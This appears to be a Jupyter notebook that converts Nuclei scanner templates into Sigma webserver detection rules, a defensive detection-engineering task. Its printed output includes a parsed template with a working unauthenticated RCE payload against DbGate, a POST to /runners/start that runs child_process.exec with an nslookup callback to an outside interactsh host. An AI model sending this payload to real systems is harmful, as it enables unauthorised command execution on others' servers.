In [1]:
!pip3 install httpsuite


In [2]:
from httpsuite import Request, Response
from datetime import datetime


In [3]:
import glob
files = glob.glob(r'C:\Users\zer0_p1k4chu\Downloads\nuclei-templates-main\nuclei-templates-main\http\cve\**\*.yaml', recursive = True)
files = files + glob.glob(r'C:\Users\zer0_p1k4chu\Downloads\nuclei-templates-main\nuclei-templates-main\http\vulnerabilities\**\*.yaml', recursive = True)

In [8]:
import yaml, uuid
def Parse(filename):
    with open(filename,'r') as stream:
        try:
            return yaml.safe_load(stream)
        except yaml.YAMLError as exc:
            print(exc)
            
def ReplaceKey(old_key,new_key,a_dict):
    a_dict[new_key] = a_dict.pop(old_key)
    return a_dict

In [10]:
class MyDumper(yaml.Dumper):

    def increase_indent(self, flow=False, indentless=False):
        return super(MyDumper, self).increase_indent(flow, False)

allRules = []
for file in files:
    rule = {}
    parsedResult = Parse(file)
    # print(parsedResult)
    rule['title'] = parsedResult['info']['name']
    rule['id'] = str(uuid.uuid4())
    rule['status'] = "experimental"
    rule['logsource'] = {"product":"webserver"}
    if 'description' in parsedResult['info'].keys():
        rule['description'] = parsedResult['info']['description']
    else:
        rule['description'] = "Converted from a Nuclei template; ID: "+parsedResult['id']
    if "reference" in parsedResult.keys():
        rule['references'] = parsedResult['reference']
    else:
        rule['reference'] = "Generated by converting Nuclei Template. Template ID: {} Refer the templates here: {}".format(parsedResult['id'],"https://github.com/projectdiscovery/nuclei-templates")
    rule['author'] = "Exploit/Attack Authors: "+parsedResult['info']['author'] + "; Converted to Sigma by: @pbssubhash"
    rule['date'] = datetime.today().strftime('%Y/%m/%d')
    selections = []
    ruleSelection = []
    for indexOne, http in enumerate(parsedResult['http']):
        # selections = []
        if 'raw' in http.keys():
            ruleSection = {}
            stems = []
            queries = []
            for indexTwo, raw in enumerate(http['raw']):
                try:
                    parsedHTTP = Request.parse(raw)
                    ruleSection['selection-method-'+str(indexOne)] = {"cs-method":[parsedHTTP.method]}
                    stems.append(str(parsedHTTP.target).split("?")[0])
                    queries.append(str(parsedHTTP.target).split("?")[1])
                    ruleSection['selection-cs-stem-'+str(indexOne)] = {"cs-uri-stem": stems}
                    if len(queries) > 0:
                        ruleSection['selection-cs-query-'+str(indexOne)] = {"cs-uri-query": queries}
                    selections.append(" and ".join(ruleSection.keys()))
                    ruleSelection.append(ruleSection)
                    rule['detection'] = ruleSelection
                except:
                    continue
        # ruleSelection['']
        else:
            ruleSelection = {}
            ruleSelection['selection-method-1'] = {"cs-method":http['method']}
            ruleSelection['selection-paths-1'] = {"cs-uri-stem":[x.split("?")[0].replace("{{BaseURL}}","").replace("{{RandomStr}}","*") for x in http['path']]}
            if "?" in str(http['path']):
                try:
                    ruleSelection['selection-query-1'] = {"cs-uri-query":[x.split("?")[1] for x in http['path']]}
                except:
                    continue
            try:
                ruleSelection['selection-status-code-1'] = {"sc-status":int([x['status'][0] for x in parsedResult['http'][0]['matchers'] if x['type'] == "status"][0])}
            except:
                ruleSelection['selection-status-code-1'] = {"sc-status":404}
            ruleSelection['condition'] = " and ".join([x for x in ruleSelection.keys() if "selection" in x])
            rule['detection'] = ruleSelection

    if "severity" in parsedResult:
        rule['level'] = parsedResult['severity']
    else:
        rule['level'] = "low"
    rule['falsepositives'] = "Nuclei scanning, Legitimate penetration testing"
    try: 
        # print("Rule == " + str(ruleSelection))
        if len(ruleSelection)== 0 or len(ruleSelection['selection-paths-1']) == 0 and len(ruleSelection['selection-query-1']) == 0:
            # print(parsedResult)
            continue
        else:
            allRules.append(yaml.dump(rule,default_flow_style=False, Dumper=MyDumper,sort_keys=False))
    except Exception as e:
        continue
        #  print(e)
        #  print(parsedResult)

{'id': 'dbgate-unauth-rce', 'info': {'name': 'DbGate Web Client - Unauthenticated Remote Command Execution', 'author': 'h0j3n', 'severity': 'critical', 'description': 'DbGate Web Client Management is suspectible to an unauthenticated remote code execution vulnerability.\n', 'reference': ['https://github.com/dbgate/dbgate', 'https://dbgate.org/docs/env-variables.html'], 'classification': {'cvss-metrics': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H', 'cvss-score': 9.8}, 'metadata': {'max-request': 1, 'shodan-query': 'http.favicon.hash:1198579728'}, 'tags': 'http,rce,oast,electron,dbgate,oss'}, 'http': [{'raw': ['POST /runners/start HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{"script":"process.mainModule.require(\'child_process\').exec(\'nslookup {{interactsh-url}}\')"}\n'], 'matchers': [{'type': 'dsl', 'dsl': ['status_code == 200', 'contains(body, \'\\"runid\\"\')', 'contains(interactsh_protocol, "dns")'], 'condition': 'and'}]}]}
{'id': 'jupyter-notebook-rce', 'inf

In [21]:
OutFolder = "Out"
import os
if not os.path.exists(OutFolder):
    os.makedirs(OutFolder)
for rule in allRules:
    fileName = rule.split("\n")[0].replace(" ","").replace("title:","").replace("<","").replace(">","").replace("/","").replace("\\","").replace('"',"")
    with open(OutFolder + os.sep + "Detecting-"+fileName + ".yaml","w") as writer:
        writer.write(rule)